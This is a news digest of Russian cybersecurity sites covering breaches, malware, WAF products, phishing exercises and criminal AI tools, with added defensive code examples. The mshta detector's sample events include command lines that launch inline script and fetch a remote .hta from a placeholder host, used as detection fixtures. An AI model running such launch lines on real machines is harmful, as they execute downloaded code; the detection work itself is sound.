Cybersecurity
👉 by %username%
A collection of cybersecurity resources
In Russian 🇷🇺
Securitylab
latest post 5 hours ago
Two colossal solar flares erupted on the Sun, and Earth is in the line of fire (video)

Alexander Antipov. Recent flares on the Sun and their potential consequences for Earth.

Earth-directed coronal mass ejections (CMEs) can seriously disrupt power grids, telecommunications systems and orbiting satellites, and expose astronauts to dangerous levels of radiation.

Powerful solar flares like last night's can cause interference in the shortwave radio band, which was observed in Australia, Japan and China.

Powerful solar flares pose a serious threat to spacecraft, satellites and ground-based technology.

To min…

5 hours ago @ securitylab.ru
Former Outabox employees stole the biometric data of Australian club-goers

A company that builds facial recognition technology should not have cut its developers' pay…

5 hours ago @ securitylab.ru
The Google trial is drawing to a close: what verdict awaits the biggest monopolist of our time?

Attorneys for the Department of Justice, the US state attorneys general and Google presented their closing arguments in the protracted case against Google.

The government contends that Google played unfairly by paying Apple and other companies billions of dollars to make its search engine the default on smartphones and in browsers.

Attorneys questioned experts and executives, including the CEOs of Google and Microsoft, Sundar Pichai and Satya Nadella.

It also fears that in the future Google will apply similar methods to monopolize the rapidly growing artificial intelligence industry.

7 hours ago @ securitylab.ru
Microsoft Graph API: how a legitimate platform became a powerful weapon for cybercriminals

Hackers deploy their C2 infrastructure on the company's resources for free and use it for malicious purposes without hesitation.

7 hours ago @ securitylab.ru
Dancing galaxies: the Cloverleaf fills space with X-rays

How X-rays revealed the secret of the mysterious rings.

7 hours ago @ securitylab.ru
Kim Jong Un is reading your mail: the NSA has disclosed a new North Korean digital attack

Social engineering takes center stage, and weak DMARC policies only play into the cybercriminals' hands.

8 hours ago @ securitylab.ru
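Added example, not from the Securitylab article or the NSA advisory it reports on: a small Python checker that parses a DMARC TXT record of the kind published at _dmarc.<domain> and reports the weaknesses the item is about, chiefly p=none, which tells receivers to deliver spoofed mail and only report it. The records below are constructed for the example; fetching a real record (a TXT query for _dmarc.<domain>) is left to the reader.

```python
from typing import List, Optional


def parse_dmarc(record: str) -> dict:
    """Split 'v=DMARC1; p=none; rua=mailto:...' into a tag -> value dict.
    Tag names are case-insensitive; values keep their case (rua is a URI)."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: Optional[str]) -> List[str]:
    """Return findings for a domain's DMARC record; an empty list means enforcing."""
    if not record:
        return ["no DMARC record: receivers apply no policy to mail claiming this domain"]
    tags = parse_dmarc(record)
    findings = []
    if tags.get("v") != "DMARC1":
        findings.append("missing v=DMARC1: receivers ignore the record entirely")
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: spoofed mail is delivered, failures are only reported")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"p={policy!r}: missing or invalid policy, treated as no policy")
    # sp= applies to subdomains and defaults to p=; sp=none reopens the gap
    if tags.get("sp", policy).lower() == "none" and policy != "none":
        findings.append("sp=none: mail from arbitrary subdomains is still delivered")
    try:
        pct = int(tags.get("pct", "100"))
    except ValueError:
        pct = 0
    if pct < 100:
        findings.append(f"pct={pct}: the policy is applied to only {pct}% of failing mail")
    if "rua" not in tags:
        findings.append("no rua= address: nobody receives aggregate reports of spoofing attempts")
    return findings


# Constructed records for the example (not real domains' data)
SAMPLE_RECORDS = {
    "reporting-only.example": "v=DMARC1; p=none; rua=mailto:dmarc@reporting-only.example",
    "partial.example": "v=DMARC1; p=reject; sp=none; pct=25",
    "enforcing.example": "v=DMARC1; p=reject; rua=mailto:dmarc@enforcing.example; adkim=s; aspf=s",
    "nothing.example": None,
}

if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        print(domain)
        for finding in assess_dmarc(record) or ["OK: enforcing policy"]:
            print("  -", finding)
```

The check is only as good as the alignment behind it: p=reject on a domain whose legitimate senders fail SPF and DKIM alignment will bounce real mail, so the usual path is p=none with rua= reporting first, then quarantine, then reject once the reports are clean.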
RedLine, the king of stealers: the new malware is found on every second device in the world

Kaspersky Lab showed how far the stealer industry has developed.

8 hours ago @ securitylab.ru
Passkeys take over the world: more than 400 million accounts have already switched to the new authentication method

Google reported on its progress and announced a couple of interesting new features.

8 hours ago @ securitylab.ru
A new law of physics? MIT demonstrates heat exchange between atoms at a distance

Scientists have learned to control atoms, bringing us closer to ideal quantum devices.

9 hours ago @ securitylab.ru
Operation Pandora: Europol shut down 12 fraudulent call centers in several countries

Police identified 39 suspects, most of whom were successfully arrested.

9 hours ago @ securitylab.ru
Revenge of the fired: how an IT company fell victim to its own employee

A security consultant decided to play extortionist, but the rules of the game turned against him.

10 hours ago @ securitylab.ru
Fix it before release: path traversal is developers' worst enemy

CISA and the FBI are calling for urgent measures to protect code.

10 hours ago @ securitylab.ru
The high-profile case of the Cisco fraudster has come to an end: the guilty party will answer before the law

A billion-dollar scam against government organizations ended in a real prison sentence.

10 hours ago @ securitylab.ru
Spying and data theft: Xiaomi and Google rush to update software over smartphone flaws

The companies are reacting to the vulnerabilities after researchers intervened.

11 hours ago @ securitylab.ru
9.8 out of 10: ArubaOS is affected by four critical vulnerabilities at once

Only an update to a fixed version will protect your network devices from compromise.

11 hours ago @ securitylab.ru
Anti-Malware
latest post 13 hours ago
What AI developments T1 Holding will work on, and why

Secondly, there is still no consensus on whether AI should be adopted at all, and to what extent, in various fields.

It is also worth noting the numerous rumors about the use of AI for military purposes and for national security.

Overall, Russia's AI development strategy had taken shape by 2019.

T1 Holding and AI. Global trends show that Russia now needs new vendors who will develop industrial AI solutions and scale them.

We want to offer the market a fundamentally new level of turnkey technology products and services in big data and AI.

13 hours ago @ anti-malware.ru
Why cybercriminals use some programming languages more often than others

We explain what makes PowerShell, Bash and JavaScript attractive to cybercriminals, what the secret of C/C++'s popularity is, and how not to fall victim to malicious Python applications.

Note that the AM Live broadcast recently discussed how to organize a vulnerability management process in 2024.

Which programming languages are used most often for attacks. It is important to keep in mind that a programming language is just a tool.

Python is one of the least popular languages among malware authors. There are programming languages that attackers turn to far less often; Python is one of them.

The use of security tools in combi…

6 days, 13 hours ago @ anti-malware.ru
Attacks on web applications in 2023: an analysis of attacker behavior

Companies in every industry are feeling the growth in attacks on their web applications.

We describe the distribution by type of the attacks on telecom companies and online platforms recorded among users of the «Вебмониторэкс» platform in 2023, and how to defend against them.

The analysis included assessing various attack types and risks in order to determine the overall level of application security.

Common attacks on telecommunications organizations. An RCE attack aims to exploit vulnerabilities in order to execute code remotely in web applications.

Regular checks of passwords for weakness and for presence in breach databases.

1 week ago @ anti-malware.ru
SafeMobile 8.3, a unified endpoint management system

COPE (Company Owned, Personally Enabled) means the company itself provides the employee with a mobile device but allows it to be used for personal purposes as well.

Different approaches require different policies for the same mobile OSes and devices.

In such products the emphasis was on using devices exclusively for corporate purposes and on separating the user's personal and work data.

These mechanisms are standard, so if your developers or suppliers have already implemented them for a foreign UEM vendor whose product you used before, no changes will be needed for SafeMobile.

Detailed documentation both for the administrator and the user and for…

1 week ago @ anti-malware.ru
The МТС RED Anti-DDoS and МТС RED WAF tandem: how to protect web applications from attacks properly

In February this year a new web application protection service, МТС RED WAF, appeared on the Russian security market.

We describe how this service, together with МТС RED Anti-DDoS, protects companies from the whole range of attacks on web resources and what the benefit of such a tandem is.

In April Anti-Malware.ru published an up-to-date review of the web application protection (WAF) market which, among others, presents the МТС RED web application protection service.

How the web application protection service works. Once a company decides to connect to the service, the DNS records for the protected web resources are changed from the owner's IP addresses to the IP addresses of the protection provider. The DNS switch alone does not hide the origin: the origin servers should accept traffic only from the provider's address ranges, otherwise the WAF can be bypassed by connecting to the original IP address directly.

This is convenient, for example, if the company…

1 week, 1 day ago @ anti-malware.ru
The pitfalls of Purple Teaming

We describe the problems of implementing Purple Teaming from both the customer's and the contractor's side.

Defenders' problems. First and foremost, Purple Teaming is needed by the defense team.

Only Purple Teaming makes it possible to find the blind spots effectively: the real "black holes", the back corners of your network.

They have to perform practically the same actions as in Red Teaming (or, very rarely, as in a typical pentest).

In that case nobody interacts with the experts conducting the Purple Teaming, and nobody asks for help.

1 week, 2 days ago @ anti-malware.ru
How to organize a vulnerability management process in 2024

The vulnerability management process. Stages of vulnerability management. What is vulnerability management (VM) in Russia?

A vulnerability management model cannot be complete enough without such an important stage as full preparation of the infrastructure, noted Anastasia Kuznetsova.

Implementing vulnerability management. The host asked the speakers how to assess an organization's readiness to implement a full vulnerability management process.

Within three to five years customers will better understand their vulnerability management needs and the solutions available to them.

1 week, 3 days ago @ anti-malware.ru
SAST, DAST, SCA, SCS: how to secure development at every stage

SAST is a set of technologies for analyzing source code and binaries for coding and design conditions that indicate vulnerabilities.

Comprehensive security analysis using Solar appScreener as an example. Let us look at a comprehensive approach to secure software development using Solar appScreener, developed by ГК «Солар».

Solar appScreener allows code analysis tools to be embedded into the secure development cycle at its various stages.

The SAST module can be used at the development and testing stages of the SSDLC to detect vulnerabilities and undeclared functionality in time.

The DAST module can be used in the final stages of development and at the software testing stage, when…

1 week, 3 days ago @ anti-malware.ru
An overview of the Russian server virtualization market

The rapid growth of the Russian server virtualization market is driven by the departure of Western vendors and tighter regulatory requirements.

This review covers software and hardware-software systems for virtualizing server infrastructure.

Trends in the global server virtualization market. According to an updated study, the global server virtualization software market was worth USD 7,878,900,000 in 2022.

Dynamics of the Russian virtualization market, RUB million (chart).

A quality server virtualization platform should be stable and reliable, support the basic virtualization functions and at the same time meet specialized scenarios.

1 week, 3 days ago @ anti-malware.ru
Why «Гарда WAF» is not really a WAF

Official announcement of «Гарда WAF». The new «Гарда WAF» product. The «Гарда» group of companies presented its «Гарда WAF» product, calling it a reflection of "a new round in the evolution of firewalls for protecting web applications".

Deployment options for cloud WAAP solutions (Gartner). Luka Safonov, CTO of «Гарда WAF», commented on this difference as follows: "a cloud support option for «Гарда WAF» is not currently being considered".

As already noted, the «Гарда» group is currently focusing on on-premises deployment of its solution, although there is no fundamental prohibition on using «Гарда WAF» in the cloud.

Rule set options for risk control («Гарда» / Weblock)…

1 week, 4 days ago @ anti-malware.ru
Why a Russian hacker trail is seen in attacks on foreign government agencies

The main function of Smoke Loader is to download and run other malware (trojans, spyware, ransomware) on the victim's device.

Features of cyberattacks using Smoke Loader. The "advantages" of the Smoke Loader dropper are its low budget and low running cost for the organizers of attacks.

A BAT file is extracted from a self-extracting archive; it in turn downloads the Smoke Loader dropper and then opens a PDF as a decoy.

All this suggests that in this case we are most likely dealing with a false-flag operation.

Conclusions. The malicious dropper Smoke Loader, which can download additional modules or software, receiving commands after connecting to a C&C server…

2 weeks ago @ anti-malware.ru
How to develop a cybersecurity strategy

The strategic management process established in the company. Determine the maturity of the company's strategic management process and study the practices in use.

At this step you also need to find out how the company defines its target state: by setting goals, by closing risks and/or threats, or in some other way.

Study the near-term security forecasts: how the security market will develop, and which threats and attack types will become popular.

To implement a security strategy successfully you need to analyze the dynamics of the security budget and the workload of security specialists, open vacancies and popu…

2 weeks, 1 day ago @ anti-malware.ru
Review of Solar webProxy 4.0, a secure web gateway

Diagram of Solar webProxy integration into the corporate infrastructure. Solar webProxy has advanced mechanisms to keep it running without interruption under high load.

Employee dossiers can be synchronized between Solar webProxy and the Solar Dozor DLP system.

Exporting events in the "Statistics" section of Solar webProxy. As already mentioned, Solar webProxy includes a firewall.

NAT configuration in Solar webProxy. Solar webProxy can be configured for access without authentication, which is relevant for a number of applications.

Creating a request filtering rule in Solar webProxy. Solar webProxy has a role-based access control module.

2 weeks, 1 day ago @ anti-malware.ru
Evil ChatGPT analogues: xxXGPT, WormGPT, WolfGPT, FraudGPT, DarkBERT

In advertising posts it was described as "a sinister AI creation in Python, representing a dark force surpassing both ChatGPT and WormGPT".

As with xxXGPT, WolfGPT was widely promoted on hacker forums and in Telegram channels, but no real confirmation of its capabilities was found beyond a few screenshots of the interface.

FraudGPT and DarkBERT. FraudGPT and DarkBERT are two more "evil" developments that someone promoted on the darknet in July 2023 alongside other AI services for cybercriminals.

ChatGPT and its "evil competitors": comparing key parameters.
Characteristic: ChatGPT / "Evil" analogues (xxXGPT, WolfGPT, FraudGPT, DarkBERT)
Ethical restrictions: Yes / None or minimal
Sec…

2 weeks, 2 days ago @ anti-malware.ru
Web application protection (WAF) market review 2024

Now, with some software products unavailable, the Russian WAF market is shifting actively toward domestic solutions: new products are appearing, and vendors are working on competitive advantages.

Based on Gartner's latest reports on the web application firewall market, the following foreign products are worth noting: Akamai Web Application Protector, Imperva WAF, Cloudflare WAF, F5 BIG-IP WAF, Barracuda WAF and AWS WAF.

Review of the domestic WAF market. Web Application Firewall products. This section looks at "boxed" products, both software and hardware-software.

«МегаФон WAF» is designed to protect web applications from exist…

2 weeks, 2 days ago @ anti-malware.ru
Habr: Infosec
latest post 10 hours ago
How Apple really tracks you

Apple ID Account Information.csv: inside we find information about every Apple ID form you have ever filled in, with all the specifics, for example your Apple ID Number (DSPersonID), i.e. which customer number you are at Apple (I am, for example, number 1341894157), the creation date, the payment card type, address, phone numbers, shipping addresses and so on.

I wonder what the purpose is of storing data about my Apple ID from 2010?

(rhetorical question) Moving on: Apple ID Device Information.csv. This file stores information about the devices that are currently linked, and have ever been linked, to your Apple ID.

App Install Activity.csv stores information about the apps you have installed, both from the App Store and…

10 hours ago @ habr.com
Attacking colleagues with toxic "pdf" shortcuts and web applications. Part 2

For those not on board yet: in the previous part we put together a methodology and chose tools for unconventional phishing exercises to test our company's employees.

To get past the security controls and the human factor, you need to use: resources and decoy files from the working environment; short payloads; obfuscated values and cryptographic transformations; low detection rates for the malicious code.

We filter the result and hand it to mshta.exe for execution via the grouping operator (), which recursively executes the functions and returns the resulting value.

The delivery stage. When we are already sitting on our suitcases and all the tackle is packed, it is time to board the ship and set off on the long-awaited…

12 hours ago @ habr.com
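Added example, not from the Habr article: the defender's side of the technique described above. It scans constructed process-creation events (Sysmon event ID 1 style, field names simplified) and flags mshta.exe launches whose command line is inline script rather than a local .hta file, points at a remote target, comes from an Office parent, or is heavily nested. The field names, thresholds and sample command lines are assumptions made for this example, not indicators taken from the article.

```python
import re
from typing import Dict, List

# Constructed sample of process-creation events (Sysmon Event ID 1 style, simplified).
# The command lines are illustrative, not taken from the article.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe javascript:a=(new ActiveXObject("WScript.Shell")).Run("calc.exe");close()'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://files.example.invalid/update.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe report.pdf.lnk"},
]

INLINE_SCRIPT = re.compile(r"\b(javascript|vbscript|about):", re.IGNORECASE)
REMOTE_TARGET = re.compile(r"\b(https?|ftp)://|\\\\[^\\]+\\", re.IGNORECASE)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
NESTING_LIMIT = 3   # assumed: more open parentheses than this on a command line is unusual


def mshta_findings(event: Dict[str, str]) -> List[str]:
    """Return the reasons this event is suspicious; an empty list means benign-looking."""
    if not event["Image"].lower().endswith(r"\mshta.exe"):
        return []
    cmd = event["CommandLine"]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    reasons = []
    if INLINE_SCRIPT.search(cmd):
        reasons.append("inline script protocol handler instead of a .hta file")
    if REMOTE_TARGET.search(cmd):
        reasons.append("remote URL or UNC path as the target")
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by an Office process ({parent})")
    if cmd.count("(") > NESTING_LIMIT:
        reasons.append("deeply nested expression on the command line")
    return reasons


def scan(events: List[Dict[str, str]]):
    """Pair each suspicious command line with its findings."""
    return [(e["CommandLine"], mshta_findings(e)) for e in events if mshta_findings(e)]


if __name__ == "__main__":
    for cmd, reasons in scan(SAMPLE_EVENTS):
        print(cmd)
        for r in reasons:
            print("  -", r)
```

A local .hta started from Explorer (the third event) produces no finding, which is the trade-off: if mshta.exe has no business in your environment at all, a plain "mshta.exe started" rule is simpler and stronger than any of these heuristics.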
Segmented network scanning with SeteZor

Our git repository: https://github.com/lmsecure/Setezor/releases. In short, it is a Swiss army knife that lets you carry out network reconnaissance, organize the information about the network, build a network map and work conveniently with large volumes of data.

Place an agent in a network segment and start a scan.

Agents are added manually on the Settings page by specifying an IP address and choosing a color for marking them on the network map.

Afterwards, when scanner logs are loaded, an agent is selected, and the application parses the logs and displays them on the network map.

Let us start a scan from another agent, having first switched to it above the tools window. List of available agents. Having started a scan with a traceroute to 1.1.1.1, and then…

12 hours ago @ habr.com
API management or API Security? What is it?

The "API Structure" component, which provides observability of the API schema, plays an important role in creating secure APIs.

It lets you identify problems specific to the current state of your API and formulate requirements to pass to the development team for improving the API and its security.

"API Protection" also helps identify and block requests showing signs of sensitive data leakage, working together with the "API Leak Detection" and "API Structure" components.

"API Testing": a new solution that lets you search for errors and vulnerabilities in an API based on its OpenAPI specification.

However, thanks to a comprehensive approach and the use of modern tools such as "API Structure",…

13 hours ago @ habr.com
Attacks on Bluetooth. Part 1

We continue the "Без про-v-ода" series; we mostly cover Wi-Fi attacks for you, but in this article we will touch on one of the popular wireless technologies, Bluetooth.

We will not consider that particular kind of attack in this article; the article is more of an introduction, with practical application of the better-known attacks on devices that use Bluetooth.

Naturally, priority will go to an external adapter; the Bluetooth utility hcitool will help us find the identifier of our adapter.

Do not be surprised that this list has no speaker, headphones or similar things that you were originally targeting.

As a result you will notice that the response time in…

13 hours ago @ habr.com
Web application security for the youngest frontend developers

There are vulnerabilities that can be defended against on the frontend side.

In fact, this can often be done either on the backend or on the frontend with roughly the same result.

However, it is a popular topic, and in interviews I have been asked to talk about something specifically based on OWASP.

SameSite cookies (lax, strict): a cookie attribute that controls whether the browser attaches the cookie to requests initiated from another site. Strict never sends it cross-site; Lax sends it only on top-level navigations with a safe method such as GET, so a cross-site form POST or fetch arrives without the session cookie. It is not a list of allowed hosts.

Here is an itemized list of what can be done for protection.

23 hours ago @ habr.com
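Added example, not from the Habr post: a Python model of the SameSite decision a browser makes, so the difference between lax and strict for CSRF is concrete. It encodes the rules as this edit understands the cookie specification (Strict: same-site requests only; Lax: same-site requests plus cross-site top-level navigations with a safe method; None: everywhere, but only if the cookie is also Secure) and deliberately ignores browser-specific extras such as Chromium's temporary allowance for Lax cookies on fresh cross-site POSTs. The request contexts are constructed for the example.

```python
from dataclasses import dataclass

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


@dataclass(frozen=True)
class Cookie:
    name: str
    samesite: str = "Lax"   # modern browsers default to Lax when the attribute is absent
    secure: bool = False


@dataclass(frozen=True)
class Request:
    method: str
    same_site: bool             # does the initiating site match the cookie's site?
    top_level_navigation: bool  # address bar, link click, form submit vs. fetch/<img>/<iframe>


def cookie_sent(cookie: Cookie, req: Request) -> bool:
    """Decide whether a browser attaches the cookie to this request."""
    mode = cookie.samesite.lower()
    if mode == "none":
        # SameSite=None without Secure is rejected outright by current browsers
        return cookie.secure
    if req.same_site:
        return True
    if mode == "strict":
        return False
    # Lax: cross-site only for top-level navigations with a safe method
    return req.top_level_navigation and req.method.upper() in SAFE_METHODS


def csrf_form_post_blocked(samesite: str) -> bool:
    """The classic CSRF: a cross-site <form method=post> auto-submitted from the attacker's page."""
    session = Cookie("session", samesite, secure=True)
    return not cookie_sent(session, Request("POST", same_site=False, top_level_navigation=True))


def csrf_get_link_blocked(samesite: str) -> bool:
    """A state-changing GET reached through a cross-site link: Lax does NOT block this."""
    session = Cookie("session", samesite, secure=True)
    return not cookie_sent(session, Request("GET", same_site=False, top_level_navigation=True))


if __name__ == "__main__":
    for mode in ("Strict", "Lax", "None"):
        print(f"{mode:6} blocks cross-site POST: {csrf_form_post_blocked(mode)}, "
              f"blocks cross-site GET link: {csrf_get_link_blocked(mode)}")
```

The last function is the point for frontend developers: Lax protects the common form-POST CSRF, but an endpoint that changes state on GET is still reachable through a link, so either use Strict for the session cookie or never mutate state on GET.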
SMS Firewall: the final word in the war on spam, or a dreary workaround?

Continuing our conversation about spam and its effectiveness as a marketing tool, we cannot avoid the topical subject of SMS Firewall.

The SMS Firewall function began to be actively deployed in smartphones and in operators' networks, at the level of their network infrastructure, around the world.

Compared with device-side anti-spam filters, SMS Firewall gives operators some important advantages in the fight against spam: centralized control at the network level.

In addition, SMS Firewall closes a potential channel for DDoS attacks on the operator's network via sender number spoofing in SMS.

And ultimately spam benefits every participant in the chain, from the compilers of databases to the manufacturers of the advertised…

1 day, 1 hour ago @ habr.com
An analysis of the distribution of prime numbers. Part 1

Euclid in the Elements proves the infinitude of primes and introduces the notion of perfect numbers, which are connected to Mersenne primes.

1742: the Goldbach conjecture is first stated, proposing that every even number greater than two can be expressed as the sum of two primes.

1996: the Great Internet Mersenne Prime Search (GIMPS) project begins, with the aim of finding large Mersenne primes using distributed computing.

(a table of F values, garbled in the extracted text, is omitted here) A second group of nonzero finite F values was identified by δ…

1 day, 2 hours ago @ habr.com
<Cookie> ctrl+c ctrl+v: automating authentication in DAST

On the proxy server we run: the script generated by the Codegen tool; a parser for the JSON file; an nginx server configured as a proxy to the web service under test, forwarding the obtained headers.

The authentication settings in both programs are standard: token, cookie, key in the request, login/password for HTTP Basic, and automatic form-based authentication.

Authorization profile in the Solar appScreener scanner. Inspiration. The concept for solving the authorization problem is to put a proxy between the DAST tool and the service being scanned.

However, we need to create a "universal" authorization method that also works in the cases where the scanners' standard access settings are not applicable.

In SPA applic…

1 day, 8 hours ago @ habr.com
Security Week 2418: the privacy of car telemetry

An important feature of this personal investigation was that Kashmir Hill and her husband most likely had not consented to the collection of such data.

Or at least they did so without fully understanding that this information would be available to someone other than the car maker.

They detect and transmit to the manufacturer data on whether the seat belt is fastened, on cases where the driver fails to keep the car in its lane, and so on.

In both cases the collection of telemetry can be explained as care for the customer: it helps improve the product.

But trading in user information is such a profitable business that it is unlikely that the major car manufacturers (just like the developers of ordinary…

1 day, 10 hours ago @ habr.com
How to set up information security in a company from scratch: two approaches that will help you miss nothing

I have been in information security for more than 10 years, and in this article I will explain how to build information security in a company from scratch.

Talk not only to your immediate manager but also to managers at different levels who are responsible for the organization's different departments.

This will help form a more complete picture and not miss anything important.

This does not mean that this approach ignores the managers' opinion: we simply rely not on it but on the industry's experience.

This approach also helps when managers have no specific concerns and simply want things "to be secure".

1 day, 10 hours ago @ habr.com
The information security threat landscape of recent years. Part 2

In the previous article we discussed the trends and evolution of malware and ransomware.

This time we would like to look at the remaining spectrum of the most common and interesting threats of recent years.

By comparison, distributing malware or ransomware requires far greater effort in terms of time and planning.

Using this botnet of IoT devices, Mirai disrupted services such as Xbox Live and Spotify and websites such as the BBC and GitHub, among many others.

They, like us, think about how to simplify their work, improve their services, make them more convenient and spread them as widely as possible.

1 day, 13 hours ago @ habr.com
Implementing SHA256 and SHA512 in Rust

I would like to try to fill the gaps in that article with my own explanations and code examples in Rust.

From the data we form blocks: for SHA256 the block size is 64 bytes (512 bits), and for SHA512 it is 128 bytes (1024 bits).

In SHA256, K holds 64 32-bit values; in SHA512, 80 64-bit values.

This code was checked on several examples against the output of the sha256sum and sha512sum tools from coreutils version 9.5.

This can be done both in the comments and in the repository.

2 days ago @ habr.com
Remember over the May holidays: 20 steps to upgrade your information security

The situation is unpleasant both for the user and for the internet provider: you have to pull up the IP address database and see where an outdated geolocation is listed.

If you did not know what a Geofeed is and how to work with it, welcome!

Selectel has similar offerings: firewall rental. Web Application Firewall solutions are the best option for publishing web applications securely.

You can choose a suitable one on the Selectel website. To restrict the pool of IP addresses allowed to access critical resources, you can use GeoIP filtering based on a list of the countries your target audience connects from.

For information security monitoring you can use open so…

2 days, 12 hours ago @ habr.com
(In)secure digest: an open server, a maritime leak and a supply-chain attack

In the May digest we cover an unscrupulous medical company, how a SaaS vendor accidentally leaked data, and negligence at India's largest electronics manufacturer.

How it happened: on April 11 the US Cybersecurity and Infrastructure Security Agency (CISA) reported a breach at the large American company Sisense.

A preliminary investigation found that US critical infrastructure organizations were among those affected.

The agency recommended that Sisense customers reset all credentials and access tokens associated with the company's tools and services.

Security tip of the month: let cyberattacks, data leaks and fines stay in our digests, while your…

2 days, 13 hours ago @ habr.com
Хакер
latest post 2 hours ago
The Dirty Stream attack threatens many Android apps

Microsoft researchers have described Dirty Stream, a new path traversal attack technique that lets a malicious Android app overwrite files in another app's home directory.

Android relies on protections such as data isolation, URI permissions and path validation to prevent unauthorized access, data leaks and path traversal attacks.

Dirty Stream lets a malicious app hand another app a file with a spoofed name or path through a custom intent.

The target app is tricked into trusting the file name or path and ends up executing or saving the file in a critical directory.

It is reported that …

2 hours ago @ xakep.ru
The Muddling Meerkat group uses the Great Firewall of China in its attacks

Infoblox researchers have identified a threat actor they named Muddling Meerkat.

The notable aspect of Muddling Meerkat's activity is manipulation of MX (Mail Exchange) records, which the actor achieves by provoking forged responses from the Great Firewall of China.

Muddling Meerkat's activity makes the system return bogus answers, which are then used to study the resilience and behaviour of other networks.

The attackers also use open resolvers to mask their activity and interact with both authoritative and recursive resolvers.

As for Muddling Meerkat's goals, it is assumed that the group may be compiling a …

3 hours ago @ xakep.ru
REvil member gets nearly 14 years in a US prison

"Yaroslav Vasinskyi and his co-conspirators broke into thousands of computers around the world and encrypted them with ransomware," the Department of Justice said.

Vasinskyi was arrested in October 2021 on a US-issued warrant while trying to enter Poland.

He was charged with conspiracy to commit fraud, intentional damage to a protected computer and conspiracy to commit money laundering.

In March 2022 Vasinskyi was extradited to the US to stand trial for at least nine ransomware attacks on American organizations.

He was also ordered to pay $16 million in restitution.

5 hours ago @ xakep.ru
Microsoft does not intend to fix the 0x80070643 problem in Windows

Microsoft has confirmed that it will not release an automatic fix for the problem that produces 0x80070643 errors when installing Windows Recovery Environment (WinRE) updates on Windows 10, 11 and Server 2022.

The problem affects Windows 10 21H2/22H2 (KB5034441), Windows 11 21H2 (KB5034440) and Windows Server 2022 (KB5034439).

Users were also advised to use the Microsoft Show or Hide Tool to hide the update after running the script, so that Windows Update stops trying to install it and triggering the error.

However, manually editing the WinRE partition proved too complicated for most users, so the update still…

7 hours ago @ xakep.ru
Cool it all down. Building a speed controller for PC fans

No, the board does regulate the speed, but as the voltage drops the fans stop at some point, and that happens far from the end position of the potentiometer.

Here you can see where the tachometer signal comes from and what it looks like, and how to add PWM speed control to it.

Same as in the previous method, except that the PWM signal switches the motor windings directly while the Hall sensor stays powered all the time.

The PWM frequency does not matter: the fan runs at 1 kHz and at 40 kHz alike, with no visible difference.

Warning: note that in this case the NE555 is powered from +5 V. …

8 hours ago @ xakep.ru
Google offers up to $450,000 for vulnerabilities in certain Android apps

Google is raising rewards for remote code execution vulnerabilities in selected Android apps tenfold, from $30,000 to $300,000.

The program covers apps developed with Google's participation, apps under research at Google, and apps developed by Google LLC, Red Hot Labs, Google Samples, Fitbit LLC, Nest Labs Inc, Waymo LLC and Waze.

Vulnerabilities that can lead to remote code execution without user interaction now fetch $300,000.

In total, researchers can earn up to $450,000 for RCE exploits against Tier 1 apps.

Google has also raised the maximum reward to $150,000 …

9 hours ago @ xakep.ru
Roskomnadzor recommends that hosting providers restrict foreign bots

According to media reports, Roskomnadzor has recommended that hosting providers listed in its hosting provider registry (428 companies as of April 2024) restrict the collection of information from Russian resources by foreign bots, including those of Google, OpenAI and Apple.

The document contains recommendations on configuring access restrictions for search bots to information on Russian sites.

It concerns foreign bots, including Google's Googlebot, OpenAI's GPTBot, Apple's Apple Bot and so on.

The response was that the document would be taken into account, with the note that the bots in question are not currently on Roskomnadzor's "blocking registry".

The head of hosting provider RUVDS…

10 hours ago @ xakep.ru
Android malware Wpeeper exploits hacked WordPress sites

Wpeeper is notable for using compromised WordPress sites as relays for its command-and-control servers, evading detection that way.

Based on Google and Passive DNS data, researchers concluded that by the time of discovery Wpeeper had infected thousands of devices, though the real scale of its activity is still unknown.

Wpeeper's C2 infrastructure is built to use hacked WordPress sites and intermediate relays to hide the location of the real C2 servers.

Using several hacked sites on different hosts in different locations improves the resilience of the C2 infrastructu…

12 hours ago @ xakep.ru
Last year Google kept 2.3 million apps out of the Play Store

Google reports that in 2023 it blocked 2.28 million apps from Google Play.

For comparison, in 2022 Google blocked almost 1.5 million dangerous apps and suspended 173,000 developer accounts for serious violations.

All these efforts are tied to Google's so-called SAFE principles, which the company spells out as: (S)afeguard Users, (A)dvocate for Developer Protection, (F)oster Responsible Innovation, (E)volve Platform Defenses.

Google is also working with 31 SDK providers to ensure that only a minimal amount of sensitive … is collected from devices running apps that use those SDKs

1 day, 5 hours ago @ xakep.ru
Roskomnadzor: Telegram has not removed more than 120,000 illegal items

Telegram has failed to remove more than 120,000 items of illegal content after demands from Roskomnadzor (RKN), media report, citing the agency.

Failure to remove prohibited content carries administrative liability, and for repeat violations fines can reach 20% of the company's annual revenue.

RKN also noted that around 505 illegal items were not removed from the streaming platform Twitch, and around 60,700 from YouTube.

According to the agency, fines for Telegram Messenger Inc. totaled 15 million rubles in 2022 and 8 million rubles in 2023.

Twitch Interactive Inc. was also fined in 2022 …

1 day, 7 hours ago @ xakep.ru
MEGANews. The most important infosec events of April

It is reported that the backdoor was planted not in the XZ Utils repository but in the TAR archives.

The malicious code is heavily obfuscated and can only be found in the full download package, not in the Git distribution, which lacks the M4 macro that starts the backdoor's build process.

In October last year X had already started charging new unverified users in New Zealand and the Philippines one dollar a year.

However, Francoff told the publication that in March he discovered another similar campaign that used the same Lua loader, SmartLoader, disguised as the Aimmy cheat software.

